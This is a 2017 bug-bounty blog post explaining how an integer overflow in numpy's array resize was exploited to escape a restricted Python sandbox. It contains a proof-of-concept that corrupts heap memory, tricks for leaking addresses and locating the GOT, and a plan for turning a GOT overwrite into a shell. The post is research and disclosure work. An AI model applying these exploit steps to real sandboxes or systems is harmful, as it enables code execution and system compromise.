Escaping a Python sandbox with a memory corruption bug

Written by gabecpike | Published 2017/03/23
Tech Story Tags: security | exploit-development | python | sandbox | vulnerability


A few weeks ago I decided to scratch an itch I’ve been having for a while — to participate in some bug bounty programs. Perhaps the most daunting task of the bug bounty game is to pick a program which yields the highest return on investment. Soon though, I stumbled upon a web application that executes user-submitted code in a Python sandbox. This looked interesting so I decided to pursue it.

Let me out of this god-forsaken sandbox!

After a bit of poking around, I discovered how to break out of the sandbox with some hacks at the Python layer. Report filed. Bugs fixed, and a nice reward to boot, all within a couple days. Sweet! A great start to my bug bounty adventures. But this post isn’t about that report. All in all, the issues I discovered are not that interesting from a technical perspective. And it turns out the issues were only present because of a regression.

But I wasn’t convinced that securing a Python sandbox would be so easy. Without going into too much detail, the sandbox uses a combination of OS-level isolation and a locked-down Python interpreter. The Python environment uses a custom whitelisting/blacklisting scheme to prevent access to unblessed builtins, modules, functions, etc. The OS-based isolation offers some extra protection, but it is antiquated by today’s standards. Breaking out of the locked-down Python interpreter is not a 100% win, but it puts the attacker dangerously close to being able to compromise the entire system.

So I returned to the application and prodded some more. No luck. This is indeed a tough cookie. But then I had a thought — Python modules are often just thin wrappers of mountainous C codebases. Surely there are gaggles of memory corruption vulns waiting to be found. Exploiting a memory corruption bug would let me break out of the restricted Python environment.

Where to begin? I know the set of Python modules which are whitelisted for importation within the sandbox. Perhaps I should run a distributed network of AFL fuzzers? Or a symbolic execution engine? Or maybe I should scan them with a state of the art static analysis tool? Sure, I could have done any of those things. Or I could have just queried some bug trackers.

Turns out I did not have this hindsight when beginning the hunt, but it did not matter much. My intuition led me to an exploitable memory corruption vulnerability in one of the sandbox’s whitelisted modules via manual code review and testing. The bug is in Numpy, a foundational library for scientific computing — the core of many popular packages, including scipy and pandas. To get a rough idea of Numpy’s potential as a source of memory corruption bugs, let’s check out the lines-of-code counts.

In the remainder of this post, I first describe the conditions which lead to the vulnerability. Next, I discuss some quirks of the CPython runtime which exploit developers should be aware of, and then I walk through the actual exploit. Finally, I wrap up with thoughts on quantifying the risk of memory corruption issues in Python applications.

The Vulnerability

The vulnerability which I am going to walk through is an integer overflow bug in Numpy v1.11.0 (and probably older versions). The issue has been fixed since v1.12.0, but there was no security advisory issued.

The vulnerability resides in the API for resizing Numpy’s multidimensional array-like objects, ndarray and friends. resize is called with a tuple defining the array’s shape, where each element of the tuple is the size of a dimension.
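Roughly, the API looks like this (a minimal sketch of normal usage; per the sidenote below, on the vulnerable version the newly added elements expose uninitialized memory):

```python
import numpy as np

arr = np.array([1, 2, 3], dtype=np.int32)
arr.resize((2, 3))   # grow the array in place to 2 rows x 3 columns
                     # (in an interactive session you may need refcheck=False)
print(arr)           # the three original values plus three new elements pulled
                     # straight from the realloc'd region
```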

Sidenote: Yup, the array is leaking uninitialized memory, but we won’t be focusing on that in this post.

Under the covers, resize actually realloc's a buffer, with the size calculated as the product of each element in the shape tuple and the element size. So in the prior snippet of code, arr.resize((2, 3)) boils down to C code realloc(buffer, 2 * 3 * sizeof(int32)). The next code snippet is the heavily paraphrased implementation of resize in C.

Spot the vulnerability? You can see inside the for-loop (line 13) that the dimensions are multiplied together to produce the new size. Later on (line 25), the product of the new size and the element size is passed to realloc as the size of the buffer which holds the array. There is some validation of the new size prior to the realloc, but it does not check for integer overflow, meaning that very large dimensions can result in an array which is allocated with insufficient size. Ultimately, this gives the attacker a powerful exploit primitive: the ability to read or write arbitrary memory by indexing from an array with an overflown size.
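To make the overflow concrete, here is the same size calculation replayed in Python with the silent 64-bit wraparound that the C multiplication produces. The shape and element size are illustrative values, not the ones from any particular report:

```python
MASK = (1 << 64) - 1          # width of npy_intp / size_t on x86-64

dims = (4, 2**60 + 1)         # attacker-controlled shape; each dimension is individually valid
elsize = 4                    # sizeof(int32)

newsize = 1
for dim in dims:
    newsize = (newsize * dim) & MASK   # C: newsize *= dims[k] -- wraps silently, no check

nbytes = (newsize * elsize) & MASK     # C: the size handed to realloc()
print(nbytes)                          # 16 -- a 16-byte buffer backing a "huge" array
```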

Let’s develop a quick proof of concept to confirm the bug exists.
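Here is a sketch of what such a PoC looks like, assuming numpy 1.11.0 on 64-bit Linux. The shape values are the same illustrative ones as above and would need tuning against the vulnerable build; patched versions reject the resize instead of under-allocating:

```python
import numpy as np

arr = np.ones(1, dtype=np.int32)

# a shape whose element count, multiplied by the 4-byte element size, wraps
# around a 64-bit size_t (illustrative values)
arr.resize((4, 2**60 + 1), refcheck=False)

# numpy now believes the array is enormous while the realloc'd buffer is only
# a handful of bytes, so indexing walks straight off the end of the allocation
print(arr[0, 100])          # out-of-bounds read: leaks adjacent heap memory
arr[0, 100] = 0x41414141    # out-of-bounds write: corrupts the heap
```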

Quirks of the CPython runtime

Before we walk through developing the exploit, I would like to discuss some ways in which the CPython runtime eases exploitation, but also ways in which it can frustrate the exploit developer. Feel free to skip this section if you want to dive straight into the exploit.

Leaking memory addresses

Typically one of the first hurdles exploits must deal with is to defeat address-space layout randomization (ASLR). Fortunately for attackers, Python makes this easy. The builtin id function returns the memory address of an object, or more precisely the address of the PyObject structure which encapsulates the object.
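For example (trivial, but from the attacker’s point of view it is the whole ASLR bypass; the printed address will differ on every run):

```python
s = "find me"
print(hex(id(s)))   # the address of the PyObject header wrapping the string
```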

In real-world applications, developers should make sure not to expose id(object) to users. In a sandboxed environment, there is not much you can do about this behavior, except perhaps blacklisting id or re-implementing id to return a hash.

Understanding memory allocation behavior

Understanding your allocator is critical for writing exploits. Python has different allocation strategies based on object type and size. Let’s check out where our big string (0xa52cd0), little string (0x7ffff7f65848), and numpy array (0x7ffff7e777b0) landed.
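A quick way to see this for yourself is to look up each object’s address in /proc/self/maps. This is a Linux-only sketch, and the addresses quoted above are from my session, so yours will differ:

```python
import numpy as np

def find_mapping(addr):
    # return the /proc/self/maps line whose address range contains addr
    with open("/proc/self/maps") as f:
        for line in f:
            lo, hi = [int(x, 16) for x in line.split(" ", 1)[0].split("-")]
            if lo <= addr < hi:
                return line.strip()

big = "A" * 100000                     # large allocation, served by malloc
small = "A" * 10                       # small allocation, served by pymalloc's mmap'd arenas
arr = np.array([1, 2, 3], dtype=np.int32)

for name, obj in [("big string", big), ("small string", small), ("numpy array", arr)]:
    print("%-12s %-16s %s" % (name, hex(id(obj)), find_mapping(id(obj))))
```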

Python object structure

Leaking and corrupting Python object metadata can be quite powerful, so it’s useful to understand how Python objects are represented. Under the covers, Python objects all derive from PyObject, a structure which contains a reference count and a descriptor of the object’s actual type. Of note, the type descriptor contains many fields, including function pointers which could be useful to read or overwrite.

Let’s inspect the small string we created in the section just prior.
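One way to peek at that header from pure Python is with ctypes. This sketch assumes a 64-bit, non-debug CPython build, where the header is a Py_ssize_t reference count followed by a pointer to the type object:

```python
import ctypes

small = "A" * 10
addr = id(small)

ob_refcnt = ctypes.c_ssize_t.from_address(addr).value
ob_type   = ctypes.c_void_p.from_address(addr + ctypes.sizeof(ctypes.c_ssize_t)).value

print("ob_refcnt: %d" % ob_refcnt)
print("ob_type:   %s" % hex(ob_type))
print("id(str):   %s" % hex(id(str)))   # should match ob_type: it points at the str type object
```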

Shellcode like it’s 1999

The ctypes library serves as a bridge between Python and C code. It provides C-compatible data types and allows calling functions in DLLs or shared libraries. Many modules that have C bindings or need to call into shared libraries import ctypes.

I noticed that importing ctypes results in the mapping of a 4K-sized memory region set with read/write/execute permissions. If it wasn’t already obvious, this means that attackers do not even need to write a ROP chain. Exploiting a bug is as simple as pointing the instruction pointer at your shellcode, granted you have already located the RWX region.

Test it for yourself!
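On Linux, a sketch like the following is enough to check; on systems with SELinux enforcing or PaX MPROTECT you may see no rwx mapping at all:

```python
import ctypes   # importing ctypes is what triggers libffi's closure allocation

with open("/proc/self/maps") as f:
    for line in f:
        if "rwx" in line.split()[1]:
            print(line.strip())   # on affected builds: one small anonymous rwx region
```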

Investigating further, I discovered that libffi’s closure API is responsible for mmap’ing the RWX region. However, the region cannot be allocated RWX on certain platforms, such as systems with SELinux enforcing or PaX MPROTECT enabled, and there is code which works around this limitation.

I did not spend much time trying to reliably locate the RWX mapping, but in theory it should be possible if you have an arbitrary-read exploit primitive. While ASLR is applied to libraries, the dynamic linker maps the regions of the library in a predictable order. A library’s regions include its globals which are private to the library and the code itself. Libffi stores a reference to the RWX region as a global. If for example you find a pointer to a libffi function on the heap, then you could precalculate the address of the RWX-region pointer as an offset from the address of the libffi function pointer. The offset would need to be adjusted for each library version.

De facto exploit mitigations

I checked the security-related compiler flags of the Python 2.7 binary on Ubuntu 14.04.5 and 16.04.1. There are a couple of weaknesses which are quite useful for the attacker:

  • Partial RELRO: The executable’s GOT section, which contains pointers to library functions dynamically linked into the binary, is writable. Exploits could replace the address of printf() with system() for example.
  • No PIE: The binary is not a Position-Independent Executable, meaning that while the kernel applies ASLR to most memory mappings, the contents of the binary itself are mapped at static addresses. Since the GOT section is part of the binary, no PIE makes it easier for attackers to locate and write to the GOT. (The snippet below shows a quick way to check this on your own build.)
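Here is a rough self-check of the PIE situation (Linux only; it simply looks at where the interpreter’s code segment was mapped, with 0x400000 being the traditional fixed base of non-PIE x86-64 binaries):

```python
import os, sys

exe = os.path.realpath(sys.executable)
with open("/proc/self/maps") as f:
    for line in f:
        if "r-x" in line and line.rstrip().endswith(exe):
            base = int(line.split("-")[0], 16)
            verdict = "no PIE: fixed load address" if base == 0x400000 else "looks like PIE/ASLR"
            print("%s mapped at %s -- %s" % (exe, hex(base), verdict))
            break
```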

Road blocks

While CPython is an environment full of tools for the exploit developer, there are forces which broke many of my exploit attempts and were difficult to debug.

  • The garbage collector, type system, and possibly other unknown forces will break your exploit if you aren’t careful about clobbering object metadata.
  • id() can be unreliable. For reasons I could not determine, Python sometimes appears to pass a copy of the object while the original object is used.
  • The region where objects are allocated is somewhat unpredictable. For reasons I could not determine, certain coding patterns led to buffers being allocated in the brk heap, while other patterns led to allocation in a Python-specific mmap'd heap.

The exploit

Soon after discovering the numpy integer overflow, I submitted a report to the bug bounty program with a proof of concept that hijacked the instruction pointer but did not inject any code. When I initially submitted, I did not realize that the PoC was actually pretty unreliable, and I wasn’t able to test it properly against their servers because validating an instruction-pointer hijack requires access to core dumps or a debugger. The vendor acknowledged the issue’s legitimacy, but they gave a less generous reward than for my first report.

Fair enough!

I’m not really an exploit developer, but I challenged myself to do better. After much trial and error, I eventually wrote an exploit which appears to be reliable. Unfortunately I was never able to test it in the vendor’s sandbox because they updated numpy before I could finish, but it does work when testing locally in a Python interpreter.

At a high level, the exploit gains an arbitrary read/write exploit primitive by overflowing the size of a numpy array. The primitive is used to write the address of system to fwrite's GOT/PLT entry. Finally, Python’s builtin print calls fwrite under the covers, so now you can call print '/bin/sh' to get a shell, or replace /bin/sh with any command.

There is a bit more to it than the high-level explanation, so check out the exploit in full below. I recommend reading it from the bottom up, including the comments. If you are using a different version of Python, adjust the GOT locations for fwrite and system before you run it.
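If you need to recover those locations for your own build, one way is to ask objdump for the interpreter’s dynamic relocations. This assumes binutils is installed and a no-PIE binary, so the printed slot offsets are absolute addresses:

```python
import subprocess, sys

out = subprocess.check_output(["objdump", "-R", sys.executable]).decode("latin-1")
for line in out.splitlines():
    parts = line.split()
    # relocation lines look like: <GOT slot address> <relocation type> <symbol name>
    if len(parts) == 3 and parts[2].split("@")[0] in ("fwrite", "system"):
        print(line)
```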

Running the exploit gives you a “hacked” shell.

Quantifying the risk

It is well known that much of Python’s core and many third-party modules are thin wrappers of C code. Perhaps less recognized is the fact that memory corruption bugs are reported in popular Python modules all the time without so much as a CVE, a security advisory, or even a mention of security fixes in release notes.

So yes, there are a lot of memory corruption bugs in Python modules. Surely not all of them are exploitable, but you have to start somewhere. To reason about the risk posed by memory corruption bugs, I find it helpful to frame the conversation in terms of two discrete use-cases: regular Python applications, and sandboxing untrusted code.

Regular applications

The types of applications we’re concerned with are those with a meaningful attack surface. Think web applications and other network-facing services, client applications which process untrusted content, privileged system services, etc. Many of these applications import Python modules built against mountains of C code from projects which do not treat their memory corruption bugs as security issues. The mere thought of this may keep some security professionals up at night, but in reality the risk is typically downplayed or ignored. I suspect there are a few reasons:

  • The difficulty of remotely identifying and exploiting memory corruption issues is quite high, especially for closed-source applications.
  • The likelihood that an application exposes a path for untrusted input to reach a vulnerable function is probably quite low.
  • Awareness is low because memory corruption bugs in Python modules are not typically tracked as security issues.

So fair enough, the likelihood of getting compromised due to a buffer overflow in some random Python module is probably quite low. But then again, memory corruption flaws can be extremely damaging when they do happen. Sometimes nobody even has to exploit them deliberately for harm to occur (see Cloudbleed). To make matters worse, it’s nigh impossible to keep libraries patched when library maintainers do not think about memory corruption issues in terms of security.

If you develop a major Python application, I suggest you at least take an inventory of the Python modules being used. Try to find out how much C code your modules are reliant upon, and analyze the potential for exposure of native code to the edge of your application.

Sandboxing

There are a number of services out there that allow users to run untrusted Python code within a sandbox. OS-level sandboxing features, such as Linux namespaces and seccomp, have only become popular relatively recently in the form of Docker, LXC, etc. Weaker sandboxing techniques can unfortunately still be found in use today — at the OS layer in the form of chroot jails, or worse, sandboxing done entirely in Python (see pypy-sandbox and pysandbox).

Memory corruption bugs completely break sandboxing which is not enforced by the OS. The ability to execute a subset of Python code makes exploitation far more feasible than in regular applications. Even pypy-sandbox, which claims to be secure because of its two-process model which virtualizes system calls, can be broken by a buffer overflow.

If you want to run untrusted code of any kind, invest the effort in building a secure OS and network architecture to sandbox it.

